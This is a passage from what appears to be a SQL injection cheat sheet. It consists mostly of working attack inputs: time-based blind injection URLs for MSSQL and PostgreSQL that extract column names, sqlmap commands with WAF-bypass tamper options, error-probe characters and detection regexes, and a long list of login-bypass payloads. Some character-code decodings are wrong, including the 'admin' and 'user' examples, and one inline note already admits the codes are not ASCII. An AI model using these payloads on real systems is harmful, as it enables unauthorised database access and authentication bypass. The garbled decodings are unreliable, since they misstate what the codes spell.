Database User = 97,50,59,55,15 = admin (note: apart from 97 = “a”, the codes quoted in this walkthrough are not the standard ASCII values of the letters in “admin”; those are 97, 100, 109, 105, 110)

TIME-BASED Extraction of 1st TABLE COLUMNS:

Next, enumerate the columns of the table(s) already found:
http://example.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name=’Members’)=4) WAITFOR DELAY ’00:00:5′– (+5 seconds)
Check the column name length before testing individual characters:
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name=’Members’),1,1)))=117) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name=’Members’),1,1)))=115) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name=’Members’),1,1)))=51) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name=’Members’),1,1)))=114) WAITFOR DELAY ’00:00:5′– (+5 seconds)
Column Name = 117,115,51,114 = user

Postgresql Blind SQLi (Stacked Queries):
id=1; select pg_sleep(5);– –
1; SELECT case when (SELECT current_setting(`is_superuser`))=’on’ then pg_sleep(5) end;– –

8. Blind SQL Injection Exploitation by SQLMap:

sqlmap -r req.txt -v 3 –time-sec=5 –technique=T –current-db
sqlmap -r req.txt -v 3 -p “input parameter” –level=5 –risk=3 –time-sec=5 –technique=T –current-db
sqlmap -r req.txt -v 3 -p “input parameter” –level=5 –risk=3 –time-sec=5 –technique=BT –current-db

9. Blind SQL Injection WAF Bypass (Tamper):

Example:
sqlmap -r req.txt -v 3 -p “input parameter” –level=5 –risk=3 –time-sec=5 –technique=T –tamper=between –current-db
Mysql,Mssql,Postgresql,Oracle (Blind):
between
Mysql (Blind):
ifnull2casewhenisnull
ifnull2ifisnull
Mysql,Mssql,Postgresql,Oracle (Blind):
charencode
Mysql,Mssql,Postgresql (Blind):
charunicodeencode
Mysql (Blind):
commalesslimit
commalessmid
Mysql (Blind):
escapequotes
UTF-8 (Blind):
apostrophemask
overlongutf8
overlongutf8more
Bypass waf in JSON (Blind):
charunicodeescape
Mysql,Postgresql,Oracle (Blind):
greatest
Cloudflare WAF (Blind):
xforwardedfor

Quick SQLMap Tamper Suggester:
https://github.com/m4ll0k/Atlas

10. SQL Detection Query (Generic Error):



‘”
.
/
\
%5c
%27
%22
%23
%3B
)
“)
‘)
))
“))
‘))
#
;

`

,
“”
//
\\
%
%00
||
#Detection source:

[“SQL syntax.*MySQL”, “Warning.*mysql_.*”, “valid MySQL result”, “MySqlClient\.”]
[“PostgreSQL.*ERROR”, “Warning.*\Wpg_.*”, “valid PostgreSQL result”, “Npgsql\.”]
[“Driver.* SQL[\-\_\ ]*Server”, “OLE DB.* SQL Server”, “(\W|\A)SQL Server.*Driver”, “Warning.*mssql_.*”, “(\W|\A)SQL Server.*[0-9a-fA-F]{8}”, “(?s)Exception.*\WSystem\.Data\.SqlClient\.”, “(?s)Exception.*\WRoadhouse\.Cms\.”]
[“Microsoft Access Driver”, “JET Database Engine”, “Access Database Engine”]
[“\bORA-[0-9][0-9][0-9][0-9]”, “Oracle error”, “Oracle.*Driver”, “Warning.*\Woci_.*”, “Warning.*\Wora_.*”]
[“CLI Driver.*DB2”, “DB2 SQL error”, “\bdb2_\w+\(“]
[“SQLite/JDBCDriver”, “SQLite.Exception”, “System.Data.SQLite.SQLiteException”, “Warning.*sqlite_.*”, “Warning.*SQLite3::”, “\[SQLITE_ERROR\]”]
[“(?i)Warning.*sybase.*”, “Sybase message”, “Sybase.*Server message.*”]

11. SQL Injection Auth Bypass:

‘=’ ‘or’
‘ or ”=’
/1#\
‘-‘
‘ ‘
‘&’
‘^’
‘*’
‘ or ”-‘
‘ or ” ‘
‘ or ”&’
‘ or ”^’
‘ or ”*’
“-”
” ”
“&”
“^”
“*”
” or “”-”
” or “” ”
” or “”&”
” or “”^”
” or “”*”
or true–
” or true–
‘ or true–
“) or true–
‘) or true–
admin’ —
admin’ #
admin’/*
admin’ or ‘1’=’1
admin’ or ‘1’=’1′–
admin’ or ‘1’=’1’#
admin’or 1=1 or ”=’
admin’ or 1=1
admin’ or 1=1–
admin’ or 1=1#
admin’ or 1=1/*
admin”) or (“1″=”1
admin”) or (“1″=”1″–
admin”) or (“1″=”1″#
admin”) or (“1″=”1″/*
admin”) or “1”=”1
admin”) or “1”=”1″–
admin”) or “1”=”1″#
admin”) or “1”=”1″/*
‘ or ‘x’=’x
‘) or (‘x’)=(‘x
‘)) or ((‘x’))=((‘x
” or “x”=”x
“) or (“x”)=(“x
“)) or ((“x”))=((“x
1’or’1’=’1
or 1=1
or 1=1–
or 1=1#
or 1=1/*
admin’ or ‘1’=’1’/*
admin’) or (‘1’=’1
admin’) or (‘1’=’1′–
admin’) or (‘1’=’1’#
admin’) or (‘1’=’1’/*
admin’) or ‘1’=’1
admin’) or ‘1’=’1′–
admin’) or ‘1’=’1’#
admin’) or ‘1’=’1’/*
admin” —
admin” #
admin”/*
admin” or “1”=”1
admin” or “1”=”1″–
admin” or “1”=”1″#
admin” or “1”=”1″/*
admin”or 1=1 or “”=”
admin” or 1=1
admin” or 1=1–
admin” or 1=1#
admin” or 1=1/*

References:
Blind SQL Injection
https://www.owasp.org/index.php/Blind_SQL_Injection
